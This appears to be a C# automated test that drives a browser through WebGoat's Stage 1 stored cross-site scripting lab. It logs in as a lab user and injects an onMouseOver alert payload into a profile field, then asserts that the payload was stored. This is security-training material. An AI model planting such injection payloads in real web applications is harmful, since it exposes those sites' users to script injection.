private string Exploit_Stage_1_Stored_XSS(string fieldToInsertPayload)
{
setup();
var payload = "<a href=\"\" onMouseOver=\"javascript:alert('xss')\">Over me to see xss</a>";
webGoat.openMainPage();
//ie.disableFlashing();
ie.link("Cross-Site Scripting (XSS)").flash().click();
ie.link("LAB: Cross Site Scripting").flash().click();
ie.link("Stage 1: Stored XSS").flash();
ie.field("password").flash().value("larry");
ie.button("Login").flash().click();
ie.selectLists()[1].options()[0].select().flash();
ie.button("ViewProfile").flash().click();
ie.button("EditProfile").flash().click();
ie.field(fieldToInsertPayload).value(payload).flash();
ie.button("UpdateProfile").flash().click();
Assert.That(ie.html().contains("onmouseover=\"javascript:alert('xss')\""), "Payload was not inserted into page");
return("ok");
}
